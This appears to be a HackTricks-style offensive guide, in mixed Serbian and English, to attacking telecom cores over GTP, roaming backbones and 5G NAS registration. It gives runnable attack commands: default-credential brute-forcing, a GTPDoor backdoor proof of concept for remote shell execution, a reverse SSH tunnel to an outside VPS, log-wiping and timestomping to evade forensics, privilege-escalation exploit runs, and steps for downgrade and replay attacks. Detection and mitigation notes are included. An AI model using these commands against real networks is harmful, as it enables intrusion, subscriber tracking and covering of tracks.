# Eksploatacija telekom mreža (GTP / roaming okruženja) {{#include ../../banners/hacktricks-training.md}} > [!NOTE] > Protokoli mobilne jezgre (GPRS Tunnelling Protocol – GTP) često prolaze kroz polu-pouzdane GRX/IPX roaming backbone-ove. Pošto se prenose preko običnog UDP-a sa gotovo nikakvom autentifikacijom, **any foothold inside a telecom perimeter can usually reach core signalling planes directly**. Sledeće beleške sakupljaju ofanzivne trikove viđene u prirodi protiv SGSN/GGSN, PGW/SGW i drugih EPC čvorova. ## 1. Recon & Initial Access ### 1.1 Default OSS / NE Accounts Iznenađujuće veliki broj vendor mrežnih elemenata isporučuje se sa hard-coded SSH/Telnet korisnicima kao što su `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Posvećen wordlist dramatično povećava brute-force uspeh: ```bash hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt ``` Ako uređaj izlaže samo management VRF, prvo pivot kroz jump host (pogledajte odeljak «SGSN Emu Tunnel» ispod). ### 1.2 Otkrivanje hostova unutar GRX/IPX Većina GRX operatera i dalje dozvoljava **ICMP echo** preko backbone-a. Kombinujte `masscan` sa ugrađenim `gtpv1` UDP sondama kako biste brzo mapirali GTP-C slušače: ```bash masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55 ``` ## 2. Enumerating Subscribers – `cordscan` Sledeći Go alat konstruše **GTP-C Create PDP Context Request** pakete i beleži odgovore. Svaki odgovor otkriva trenutni **SGSN / MME** koji opslužuje upitani IMSI i, ponekad, posećeni PLMN pretplatnika. ```bash # Build GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan # Usage (typical): ./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap ``` Ključne opcije: - `--imsi` Ciljni pretplatnik IMSI - `--oper` Home / HNI (MCC+MNC) - `-w` Snima sirove pakete u pcap Važne konstante unutar binary mogu biti patched da prošire skeniranja: ``` pingtimeout = 3 // seconds before giving up pco = 0x218080 common_tcp_ports = "22,23,80,443,8080" ``` ## 3. Code Execution over GTP – `GTPDoor` `GTPDoor` je mali ELF servis koji **veže se na UDP 2123 i parsira svaki dolazni GTP-C paket**. Kada payload počinje sa pre-shared tag-om, ostatak se dekriptuje (AES-128-CBC) i izvršava preko `/bin/sh -c`. stdout/stderr su exfiltrated unutar **Echo Response** poruka tako da nikakva izlazna sesija nikada nije kreirana. Minimalni PoC paket (Python): ```python import gtpc, Crypto.Cipher.AES as AES key = b"SixteenByteKey!" cmd = b"id;uname -a" enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00")) print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc)) ``` Detekcija: * bilo koji host koji šalje **unbalanced Echo Requests** to SGSN IPs * GTP version flag set to 1 while message type = 1 (Echo) – odstupanje od specifikacije ## 4. Pivoting kroz jezgro ### 4.1 `sgsnemu` + SOCKS5 `OsmoGGSN` dolazi sa SGSN emulatorom sposoban da **establish a PDP context towards a real GGSN/PGW**. Nakon pregovora, Linux dobija novi `tun0` interfejs dostupan from the roaming peer. ```bash sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \ -APN internet -c 1 -d ip route add 172.16.0.0/12 dev tun0 microsocks -p 1080 & # internal SOCKS proxy ``` Uz pravilno firewall hair-pinning, ovaj tunel zaobilazi signalling-only VLAN-ove i dovodi vas direktno u **sloj podataka**. ### 4.2 SSH Reverse Tunnel preko Port 53 DNS je skoro uvek otvoren u roaming infrastrukturama. Izložite internu SSH uslugu na svoj VPS koja sluša na :53 i kasnije se vratite iz kuće: ```bash ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com ``` Proverite da li je `GatewayPorts yes` omogućeno na VPS-u. ## 5. Skriveni kanali | Kanal | Transport | Dekodiranje | Napomene | |---------|-----------|----------|-------| | ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | čisto pasivni listener, bez odlaznog saobraćaja | | DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) kodirano u oktetima A-record zapisa | prati poddomen `*.nodep` | | GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob u privatnom IE | uklapa se sa legitimnim GTP-C saobraćajem | Svi implants implementiraju watchdogs koji **timestomp** njihove binarne fajlove i re-spawnuju se ako se sruše. ## 6. Defense Evasion Cheatsheet ```bash # Remove attacker IPs from wtmp utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp # Disable bash history export HISTFILE=/dev/null # Masquerade as kernel thread echo 0 > /proc/$$/autogroup # hide from top/htop printf '\0' > /proc/$$/comm # appears as [kworker/1] touch -r /usr/bin/time /usr/bin/chargen # timestomp setenforce 0 # disable SELinux ``` ## 7. Privilege Escalation na Legacy NE ```bash # DirtyCow – CVE-2016-5195 gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd # PwnKit – CVE-2021-4034 python3 PwnKit.py # Sudo Baron Samedit – CVE-2021-3156 python3 exploit_userspec.py ``` Savet za čišćenje: ```bash userdel firefart 2>/dev/null rm -f /tmp/sh ; history -c ``` ## 8. Alati * `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – custom tooling described in previous sections. * `FScan` : intranet TCP skeniranje (`fscan -p 22,80,443 10.0.0.0/24`) * `Responder` : LLMNR/NBT-NS rogue WPAD * `Microsocks` + `ProxyChains` : lagano SOCKS5 pivotiranje * `FRP` (≥0.37) : NAT traversal / asset bridging ## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay Procedura 5G registracije se odvija preko NAS (Non-Access Stratum) na vrhu NGAP. Dok se NAS security ne aktivira preko Security Mode Command/Complete, inicijalne poruke nisu autentifikovane i nisu enkriptovane. Ovo pre-security prozor omogućava više putanja napada ako možete da posmatrate ili manipulišete N2 saobraćajem (npr. on-path unutar core-a, rogue gNB, ili testbed). Registration flow (pojednostavljeno): - Registration Request: UE šalje SUCI (šifrovani SUPI) i capability-je. - Authentication: AMF/AUSF šalju RAND/AUTN; UE vraća RES*. - Security Mode Command/Complete: NAS integritet i šifrovanje se pregovaraju i aktiviraju. - PDU Session Establishment: IP/QoS podešavanje. Lab setup saveti (non-RF): - Core: Open5GS default deployment je dovoljan za reprodukciju flow-ova. - UE: simulator ili test UE; dekodujte pomoću Wireshark. - Active tooling: 5GReplay (capture/modify/replay NAS unutar NGAP), Sni5Gect (sniff/patch/inject NAS on the fly bez podizanja kompletnog rogue gNB). - Korisni display filteri u Wireshark: - ngap.procedure_code == 15 (InitialUEMessage) - nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request) ### 9.1 Identifier privacy: SUCI failures exposing SUPI/IMSI Očekivano: UE/USIM mora da šalje SUCI (SUPI enkriptovan javnim ključem home-network-a). Pronalazak plaintext SUPI/IMSI u Registration Request ukazuje na problem privatnosti koji omogućava persistento praćenje pretplatnika. Kako testirati: - Capturujte prvu NAS poruku u InitialUEMessage i pregledajte Mobile Identity IE. - Wireshark quick checks: - Trebalo bi da dekoduje kao SUCI, ne kao IMSI. - Primer filtera: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` bi trebalo da postoji; odsustvo tog polja uz prisustvo `imsi` ukazuje na curenje. Šta sakupiti: - MCC/MNC/MSIN ako su izloženi; logujte po-UE i pratite kroz vreme/lokacije. Mitigacija: - Enforce SUCI-only UEs/USIMs; alert na bilo koji IMSI/SUPI u inicijalnom NAS. ### 9.2 Capability bidding-down to null algorithms (EEA0/EIA0) Pozadina: - UE advertajzuje podržane EEA (encryption) i EIA (integrity) u UE Security Capability IE Registration Request-a. - Uobičajene mape: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 su null algoritmi. Problem: - Pošto Registration Request nije integrity zaštićen, on-path napadač može da očisti capability bitove da bi primorao kasniji izbor EEA0/EIA0 tokom Security Mode Command. Neki stack-ovi pogrešno dozvoljavaju null algoritme i izvan emergency servisa. Ofanzivni koraci: - Intercept InitialUEMessage i modifikujte NAS UE Security Capability da advertajzuje samo EEA0/EIA0. - Sa Sni5Gect, hook-ujte NAS poruku i patch-ujte capability bitove pre prosleđivanja. - Posmatrajte da li AMF prihvata null cipher/integrity i završava Security Mode sa EEA0/EIA0. Verifikacija/vidljivost: - U Wireshark, potvrdite izabrane algoritme posle Security Mode Command/Complete. - Primer pasivnog sniffer output-a: ``` Encyrption in use [EEA0] Integrity in use [EIA0, EIA1, EIA2] SUPI (MCC+MNC+MSIN) 9997000000001 ``` Mitigacije (mora): - Konfigurišite AMF/policy da odbacuje EEA0/EIA0 osim tamo gde je strogo naloženo (npr. hitni pozivi). - Preferirajte primenu EEA2/EIA2 kao minimum; zabeležite i podignite alarm za svaki NAS security context koji pregovara null algorithms. ### 9.3 Ponavljanje (replay) početnog Registration Request-a (pre-security NAS) Pošto početni NAS nema integritet i svežinu, uhvaćeni InitialUEMessage+Registration Request mogu biti ponovo poslati AMF. PoC pravilo za 5GReplay za prosleđivanje podudarnih replay-a: ```xml ``` What to observe: - Whether AMF accepts the replay and proceeds to Authentication; lack of freshness/context validation indicates exposure. Mitigations: - Enforce replay protection/context binding at AMF; rate-limit and correlate per-GNB/UE. ### 9.4 Tooling pointers (reproducible) - Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS. - Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration. - 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule. - Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences. ### 9.5 Defensive checklist - Continuously inspect Registration Request for plaintext SUPI/IMSI; block offending devices/USIMs. - Reject EEA0/EIA0 except for narrowly defined emergency procedures; require at least EEA2/EIA2. - Detect rogue or misconfigured infrastructure: unauthorized gNB/AMF, unexpected N2 peers. - Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage. --- ## Ideje za detekciju 1. **Bilo koji uređaj osim SGSN/GGSN koji uspostavlja Create PDP Context Requests**. 2. **Nestandardni portovi (53, 80, 443) koji primaju SSH handshakes** iz internog IP prostora. 3. **Česti Echo Requests bez odgovarajućih Echo Responses** – može ukazivati na GTPDoor beacone. 4. **Visoka stopa ICMP echo-reply saobraćaja sa velikim, nenultim identifier/sequence poljima**. 5. 5G: **InitialUEMessage koji nosi NAS Registration Requests ponovljene sa identičnih endpoint-a** (signal repleja). 6. 5G: **NAS Security Mode koji pregovara EEA0/EIA0** van konteksta hitnih procedura. ## References - [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/) - 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0) - 3GPP TS 29.281 – GTPv2-C (v17.6.0) - [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol) - 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS - 3GPP TS 33.501 – Security architecture and procedures for 5G System {{#include ../../banners/hacktricks-training.md}}